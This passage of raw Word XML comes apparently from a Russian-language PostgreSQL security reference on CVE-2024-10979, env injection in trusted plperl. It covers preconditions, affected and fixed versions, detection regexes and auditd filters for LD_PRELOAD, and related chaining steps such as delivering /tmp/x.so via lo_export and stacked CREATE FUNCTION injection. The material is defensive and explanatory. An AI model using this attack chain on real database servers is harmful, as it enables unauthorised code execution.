      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что plperl trusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB59539" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схеме — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда выдан (temp-schema есть у каждой сессии). До PG 15 — на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдан PUBLIC; с PG 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничен, но pg_temp остаётся.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2ABA39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436E2C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> должен быть установлен (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:t>). На managed-провайдерах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A64CAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Google Cloud SQL — plperl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>предоставляется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в стандартной поставке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED849A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   AWS RDS — plperl опционально (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds.extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> параметр)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8EB6CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Supabase — plperl не предоставляется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2007D195" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS-зависимости:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Perl-runtime + postgresql-plperl пакет. Те же требования, что для 3.7.2a — обычно идут вместе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67000550" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8B325" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition для активного RCE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вредоносный файл в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доставлен другим каналом (см. выше).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D4731"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5D6184A3"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F80F7D9"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1B0F986" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="33358ED3"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2A3DD5"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92B4F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10979</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0533DDC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B4F5D7"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4813FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4FD6EB6F"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CFE15A"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050D2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 ноября 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="488DDE2F"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12DFBD"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1E040B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2054BF6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9186C9"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EC8FC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="62A7EEA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409548"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ABDF72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>env injection в trusted-sandbox plperl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="11FBB52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7B7F7E"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D6E429" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE / privilege escalation без superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0060DB0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trusted plperl используется для прикладных вычислительных функций (text processing, sanitization) — без манипуляций env, без OS-API. Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC06BAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pP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для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang = 'plperl'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (trusted) И исходным кодом, содержащим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>delete $ENV</w:t>
      </w:r>
      <w:r>
        <w:t>. Это статический сканер, специфичный для CVE-2024-10979.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF792E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\$ENV\{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри тел plperl-функций (не plperlu).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08BDD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   На уязвимой версии PG (&lt; 17.1 / 16.5 / ...) — любая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LANGUAGE plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от не-DBA-сессии стоит ревьюить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666C82E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Аномальный спавн подпроцессов backend-ом с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в env — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auid postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + env containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A4A9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки PG до фикса 14.11.2024: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1CEAF62E"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BACD122" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>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FDFE15E"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AD588B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2674C8A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F2F595" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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C46226" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0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F5F995" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1ABEEE2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42B4DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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216856" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.4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AC9437" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2BC5608C"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C41947" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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0A85F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.8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25862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="74761FF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15B67F"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070599" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.13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6E81CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="70BCBD01"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B50AB0"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67F88D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.16</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B70160" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6D51B731"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ABB665"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80EAE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.20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BF7755" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72EDBF4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На версиях PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в trusted plperl даёт runtime-ошибку Safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0A10D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF2C7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичный spawning-вектор для активации LD_PRELOAD после установки в env. Хотя если есть COPY PROGRAM напрямую, CVE-2024-10979 редко даёт что-то сверху.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A9D29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же RCE, но при наличии superuser. CVE-2024-10979 — обходной путь без superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C215C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — канал доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до использования preload. Требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это reduces, но не исключает применимость.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38689CD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extension scripts: один из путей получить право установить plperl, если оно не установлено по умолчанию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2054C1F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг для протаскивания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... ; SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через одну точку инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA1D182" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст по фиксам 14.11.2024 (CVE-2024-10976, 10977, 10978, 10979).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF4B95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07336794" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2024-10979 — https://www.postgresql.org/support/security/CVE-2024-10979/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A194113" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
